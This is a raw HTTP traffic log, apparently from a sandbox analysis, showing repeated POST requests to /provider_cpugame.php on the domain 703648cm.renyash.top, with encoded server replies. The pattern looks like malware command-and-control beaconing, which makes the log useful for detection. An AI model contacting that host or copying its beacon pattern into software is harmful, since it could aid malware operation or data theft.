                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:02.878721952 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:03.592873096 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:01 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 56 20 15 2e 52 24 11 0c 0b 3f 0a 34 0e 25 11 28 1c 38 0e 2a 5e 32 3e 25 59 2a 3b 04 53 29 1d 39 10 32 1d 00 0f 24 13 24 0f 26 0e 2b 51 03 10 22 5f 32 13 2a 5b 24 2f 30 1e 24 1d 38 59 22 2e 20 45 22 1d 29 09 34 00 21 57 33 3e 2d 53 2a 3a 29 12 2b 24 24 5d 28 0f 0a 06 2a 2d 20 52 09 16 25 09 29 38 37 0c 30 3b 20 56 28 13 2b 01 26 28 25 52 2a 03 2a 1d 3c 3d 23 0b 2a 11 16 19 26 0e 36 5c 29 5c 29 5c 32 14 3b 0a 33 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %V .R$?4%(8*^2>%Y*;S)92$$&+Q"_2*[$/0$8Y". E")4!W3>-S*:)+$$](*- R%)870; V(+&(%R**<=#*&6\)\)\2;3&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:03.593856096 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:04.000437021 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:04.718189001 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:02 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 52 37 5d 22 57 27 3f 03 52 28 33 05 1d 31 3f 01 08 3b 0e 35 06 25 2e 3a 00 3c 05 2a 52 3e 23 2d 58 26 55 2e 0b 25 2d 01 52 26 1e 2b 51 03 10 22 5d 31 3d 3e 5a 30 3c 3f 0a 27 23 38 5d 22 3e 3c 07 35 55 3e 55 21 2a 3e 0a 27 3e 2e 08 3d 07 26 01 29 1a 28 5c 2b 1f 23 5e 3d 17 20 52 09 16 25 0e 2a 5e 28 51 25 3b 3f 0f 2b 2d 3b 01 26 38 21 56 3d 04 2d 0e 3c 3e 28 54 2a 01 24 57 26 23 21 05 29 5c 25 16 25 04 06 14 30 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %R7]"W'?R(31?;5%.:<*R>#-X&U.%-R&+Q"]1=>Z0<?'#8]"><5U>U!*>'>.=&)(\+#^= R%*^(Q%;?+-;&8!V=-<>(T*$W&#!)\%%08&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:04.718976021 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:05.126379013 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:05.846785069 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:04 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 57 21 2b 29 0d 24 3f 39 50 3c 0d 01 12 25 2c 27 0b 2f 23 21 01 31 2d 25 5c 3c 15 00 57 29 33 21 5e 26 30 21 55 24 3e 3b 57 24 34 2b 51 03 10 22 5d 32 3e 2d 02 24 11 30 52 33 30 38 15 21 2e 27 1c 36 0a 26 1e 23 3a 3a 0b 27 10 03 15 2a 17 03 5b 2b 37 20 15 28 32 27 5c 3d 07 20 52 09 16 25 09 3e 3b 3b 0c 27 5e 3c 50 29 3d 02 5f 26 3b 3d 57 2a 13 32 52 3f 00 2c 53 2a 3f 16 1a 24 23 35 00 28 3a 2d 16 26 14 0e 52 24 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %W!+)$?9P<%,'/#!1-%\<W)3!^&0!U$>;W$4+Q"]2>-$0R308!.'6&#::'*[+7 (2'\= R%>;;'^<P)=_&;=W*2R?,S*?$#5(:-&R$&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:05.847580910 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:06.254261017 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:06.972044945 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:05 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0a 20 3b 2a 54 26 3f 3d 15 3c 33 06 0f 26 59 38 19 2f 30 29 07 31 2e 39 5c 3f 2b 31 0f 3d 33 29 13 32 30 3d 11 33 13 23 1f 25 1e 2b 51 03 10 22 5c 32 3e 22 5f 33 01 3c 55 30 33 02 5e 21 2e 24 42 22 33 03 0d 23 5f 3a 0c 27 3d 39 1a 2a 29 35 5e 2b 24 02 5b 3c 32 28 04 29 3d 20 52 09 16 26 1f 29 01 3f 0d 27 01 34 55 3c 3d 30 14 25 38 3d 50 3e 13 32 56 2b 10 3f 0e 2a 2f 16 51 26 1e 32 1e 29 3a 29 19 24 29 24 56 33 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: & ;*T&?=<3&Y8/0)1.9\?+1=3)20=3#%+Q"\2>"_3<U03^!.$B"3#_:'=9*)5^+$[<2()= R&)?'4U<=0%8=P>2V+?*/Q&2):)$)$V3(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:06.972897053 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:07.379245996 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:08.099395990 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:06 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0b 37 5d 2e 1f 30 3c 2d 18 2b 0d 3b 54 24 2f 0d 44 2c 33 35 07 25 10 21 1a 28 28 32 57 29 33 26 01 31 0d 31 52 27 3d 05 53 25 24 2b 51 03 10 21 04 25 3e 3a 5b 26 2f 0e 55 33 0a 2c 59 20 2e 2c 0a 22 20 32 54 37 00 29 55 33 00 29 53 2a 3a 35 13 29 1d 28 5c 3f 21 01 14 3d 07 20 52 09 16 26 50 2a 28 3c 54 24 38 2c 12 29 2d 20 1a 32 06 2d 1b 2a 3e 22 55 3c 3e 30 52 2b 2f 30 56 24 30 31 05 2a 04 25 17 32 03 38 19 33 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &7].0<-+;T$/D,35%!((2W)3&11R'=S%$+Q!%>:[&/U3,Y .," 2T7)U3)S*:5)(\?!= R&P*(<T$8,)- 2-*>"U<>0R+/0V$01*%2838&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:08.100053072 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:08.506885052 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:09.241400003 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:07 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 11 20 2b 3d 0e 30 01 39 51 2b 1d 2f 51 26 06 2f 41 3b 0e 2e 15 25 07 3d 5e 2a 28 32 1b 2a 33 3d 10 26 0d 07 55 24 03 05 10 25 34 2b 51 03 10 21 01 24 3d 29 01 26 3f 0e 55 27 23 38 16 21 2d 3b 1a 21 1d 0c 57 23 2a 2a 0c 24 3d 26 08 28 39 2e 07 3d 1d 2f 04 28 57 30 00 3d 3d 20 52 09 16 26 51 3e 5e 3b 0f 25 38 3f 0f 2b 2e 23 00 26 5e 21 18 29 03 36 57 2a 3e 27 0f 29 01 24 51 25 1e 2a 10 3d 03 3a 06 32 3a 28 19 27 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: % +=09Q+/Q&/A;.%=^*(2*3=&U$%4+Q!$=)&?U'#8!-;!W#**$=&(9.=/(W0== R&Q>^;%8?+.#&^!)6W*>')$Q%*=:2:('&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:09.242301941 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:09.648952961 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:10.430258036 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:08 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1f 20 05 3e 53 24 59 39 57 3c 23 24 0f 26 06 3f 0b 38 56 35 06 26 3e 31 5c 3c 3b 04 52 3f 20 3d 12 25 33 2e 0d 33 3d 33 1e 26 24 2b 51 03 10 22 5d 25 2d 22 12 30 59 37 0a 24 0d 2f 04 20 2e 20 43 36 0d 31 08 21 3a 3a 0e 33 07 39 18 3d 2a 21 5b 29 1a 0e 17 28 0f 33 1b 3f 3d 20 52 09 16 26 1c 29 06 23 0d 24 28 24 54 29 3d 05 04 26 06 25 18 28 2e 21 0e 28 07 30 56 3d 59 3c 1a 32 1e 0b 04 28 3a 07 16 25 04 34 14 27 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: % >S$Y9W<#$&?8V5&>1\<;R? =%3.3=3&$+Q"]%-"0Y7$/ . C61!::39=*![)(3?= R&)#$($T)=&%(.!(0V=Y<2(:%4'8&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:10.431032896 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:10.837608099 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:11.277044058 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:09 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 56 20 15 35 0b 33 3c 39 1a 2b 0a 2c 0e 32 06 27 08 2f 30 21 07 32 00 13 17 28 5d 35 08 2a 0d 21 5a 25 0a 31 52 27 04 2b 52 26 0e 2b 51 03 10 21 00 25 3d 07 01 24 2c 3c 57 27 33 01 01 21 00 2c 07 23 33 2e 1c 20 17 2d 56 30 2e 3a 08 2a 5f 36 03 29 37 33 06 28 1f 37 59 3d 2d 20 52 09 16 26 56 29 28 3c 50 30 06 24 56 3f 3d 2c 5d 32 3b 2a 09 3e 03 00 56 3f 3e 3f 0a 29 2c 37 09 26 20 2a 11 3e 14 2e 03 26 5c 2b 08 30 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %V 53<9+,2'/0!2(]5*!Z%1R'+R&+Q!%=$,<W'3!,#3. -V0.:*_6)73(7Y=- R&V)(<P0$V?=,]2;*>V?>?),7& *>.&\+0&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:11.279544115 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:11.689166069 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:12.406141043 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:10 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 52 20 28 3e 52 24 11 22 0b 2b 0a 2f 56 25 06 2f 06 2f 09 3d 06 24 3d 3d 5e 3c 3b 22 50 3e 20 3d 59 31 0d 35 1e 25 3e 27 1e 32 34 2b 51 03 10 21 00 25 2e 2d 07 33 3c 23 0a 24 20 2c 15 35 2d 28 43 36 20 3e 54 23 00 25 1e 27 3e 2d 1b 2a 29 2a 07 3d 42 23 06 3f 32 27 14 3d 3d 20 52 09 16 26 54 3d 06 1a 1e 33 38 34 55 2b 13 3f 00 32 3b 3d 1b 3d 3d 00 52 28 58 3f 0e 2a 01 16 50 25 30 29 01 3e 14 0b 14 25 5c 23 08 30 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %R (>R$"+/V%//=$==^<;"P> =Y15%>'24+Q!%.-3<#$ ,5-(C6 >T#%'>-*)*=B#?2'== R&T=384U+?2;===R(X?*P%0)>%\#0&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:12.406994104 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:12.813941956 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:13.548434973 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:11 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0c 23 2b 3e 56 24 2c 26 0f 2b 1d 20 0d 32 01 2b 08 2f 56 32 5e 25 2d 2a 06 28 02 2a 52 3e 0d 0b 5b 25 33 07 1e 25 2d 27 1f 26 34 2b 51 03 10 21 06 26 13 0c 5f 30 3f 2c 57 26 23 23 04 35 3e 06 0a 36 0d 2d 0c 34 00 36 0f 24 00 25 52 29 00 31 5b 3d 24 30 5e 3c 0f 2f 5e 2a 2d 20 52 09 16 26 1c 3d 06 28 13 27 28 20 1f 3c 03 2c 59 32 38 32 08 3d 2d 36 56 2b 3d 20 57 2b 2c 34 53 32 33 2e 5d 28 39 29 17 25 2a 0e 19 33 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &#+>V$,&+ 2+/V2^%-*(*R>[%3%-'&4+Q!&_0?,W&##5>6-46$%R)1[=$0^</^*- R&=('( <,Y282=-6V+= W+,4S23.](9)%*3(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:13.549207926 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:13.955787897 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:14.672549963 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:12 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0c 21 28 35 0d 30 11 03 57 29 33 2b 56 32 3f 06 1d 2e 20 03 06 24 2e 3e 06 28 3b 31 09 3e 0d 21 13 26 0d 3d 1c 33 3d 33 10 32 1e 2b 51 03 10 21 01 32 04 25 07 27 01 09 0b 26 20 23 00 35 3e 24 44 21 1d 0c 51 23 07 0b 1f 33 10 29 52 28 39 21 58 2a 37 28 5e 2b 31 0e 00 3f 2d 20 52 09 16 25 0d 2a 28 34 54 27 16 38 1c 2b 5b 27 06 31 3b 3d 15 29 5b 36 53 2a 2d 38 57 2a 01 20 52 25 1e 00 11 28 2a 07 16 26 39 27 08 26 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &!(50W)3+V2?. $.>(;1>!&=3=32+Q!2%'& #5>$D!Q#3)R(9!X*7(^+1?- R%*(4T'8+['1;=)[6S*-8W* R%(*&9'&8&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:14.673367023 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:15.079718113 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:15.855648041 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:14 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0f 23 2b 2e 1e 24 3c 31 18 28 0d 06 0f 32 11 0d 08 2c 0e 29 05 24 2d 26 01 2b 3b 22 51 3e 1d 32 00 26 0a 36 0e 33 04 34 0e 25 0e 2b 51 03 10 21 07 24 2e 39 07 30 59 2c 1f 24 1d 38 58 21 07 28 07 22 1d 0f 0d 23 39 2d 54 30 3d 3e 0f 29 07 07 59 29 34 3c 16 2a 22 33 58 2a 07 20 52 09 16 26 12 29 01 24 1c 27 06 0e 57 28 3d 27 06 32 01 31 51 29 2d 36 56 2b 10 2c 1e 2a 06 34 50 24 20 04 13 2a 14 2e 02 24 39 3c 56 27 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &#+.$<1(2,)$-&+;"Q>2&634%+Q!$.90Y,$8X!("#9-T0=>)Y)4<*"3X* R&)$'W(='21Q)-6V+,*4P$ *.$9<V'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:15.856573105 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:16.263200998 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:17.054038048 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:15 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0e 20 2b 22 1e 27 3f 32 09 3c 33 2b 1c 24 3c 27 41 3b 09 3e 5d 31 00 14 05 3c 5d 2d 08 3e 20 2e 03 26 55 31 1f 24 2d 09 57 26 34 2b 51 03 10 21 01 26 03 2e 5a 33 01 3f 0d 26 33 02 5c 22 07 34 43 22 0d 22 55 34 29 22 0b 33 3d 3d 50 3e 07 31 5b 2a 1d 23 03 28 32 30 00 3f 3d 20 52 09 16 25 0f 2a 06 34 56 27 16 24 1d 29 2d 0e 17 26 28 03 52 3d 3e 29 0c 3c 10 3c 1f 2a 3c 3b 08 25 0e 03 04 3e 3a 35 5e 32 3a 2b 0a 27 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: & +"'?2<3+$<'A;>]1<]-> .&U1$-W&4+Q!&.Z3?&3\"4C""U4)"3==P>1[*#(20?= R%*4V'$)-&(R=>)<<*<;%>:5^2:+'8&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:17.054867029 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:17.461694002 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:18.190514088 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:16 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1c 37 05 36 52 24 06 3d 15 28 30 34 0e 26 2f 33 41 38 33 32 5c 25 00 3e 07 3f 2b 3e 56 29 1d 25 59 32 1d 25 11 30 2e 37 54 31 34 2b 51 03 10 22 16 26 03 22 5e 27 2c 28 1d 27 33 33 00 22 3e 05 1b 35 1d 22 13 23 07 2d 57 24 10 29 51 28 29 3d 58 3d 0a 3c 17 3f 22 3b 58 3d 3d 20 52 09 16 25 0e 2a 2b 28 54 25 28 3c 55 2b 13 3c 14 32 06 0f 53 3d 03 32 55 28 2e 0e 53 2b 2c 3b 0e 24 23 2a 13 3e 04 29 5d 25 39 20 19 30 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %76R$=(04&/3A832\%>?+>V)%Y2%0.7T14+Q"&"^',('33">5"#-W$)Q()=X=<?";X== R%*+(T%(<U+<2S=2U(.S+,;$#*>)]%9 0&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:18.195660114 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:18.603946924 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:19.029418945 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:17 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0b 34 28 31 0f 26 2f 0f 57 2b 23 23 50 26 59 23 09 2f 0e 26 5f 32 3d 39 58 2a 3b 35 0b 2a 23 00 01 32 0d 21 1f 27 04 38 0f 26 34 2b 51 03 10 21 01 31 03 29 00 27 01 2c 10 33 23 23 07 22 00 0a 45 36 23 3a 56 37 00 25 1f 24 10 04 0e 3d 29 07 13 29 1d 2c 5e 28 21 38 06 29 17 20 52 09 16 26 51 3d 28 38 1e 27 3b 38 57 3c 2e 3c 1a 25 38 25 1a 2a 03 32 56 28 58 33 0c 2b 3f 30 51 25 0e 0c 5b 3d 39 29 5a 31 3a 24 56 26 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &4(1&/W+##P&Y#/&_2=9X*;5*#2!'8&4+Q!1)',3##"E6#:V7%$=)),^(!8) R&Q=(8';8W<.<%8%*2V(X3+?0Q%[=9)Z1:$V&8&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:19.030567884 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:19.437222004 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:20.146260977 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:18 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0c 21 38 21 0d 33 2c 21 1a 28 0d 06 0c 24 3c 38 1b 2f 0e 32 5c 26 00 2a 00 2b 15 31 0f 3e 0a 21 5b 25 55 29 11 25 2d 09 1e 26 34 2b 51 03 10 21 06 32 13 3a 5f 27 11 33 0d 26 30 3c 5f 22 2e 01 1d 35 33 2e 1e 34 39 25 57 33 10 3e 09 3d 2a 21 13 3d 42 33 03 28 22 34 04 29 17 20 52 09 16 26 54 2a 01 23 09 24 38 3f 08 28 2e 38 5e 24 2b 32 0e 2a 3d 21 0f 2a 3e 0e 57 3e 3c 3c 1b 32 09 22 5b 3e 39 3a 05 26 03 37 09 27 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &!8!3,!($<8/2\&*+1>![%U)%-&4+Q!2:_'3&0<_".53.49%W3>=*!=B3("4) R&T*#$8?(.8^$+2*=!*>W><<2"[>9:&7'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:20.147113085 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
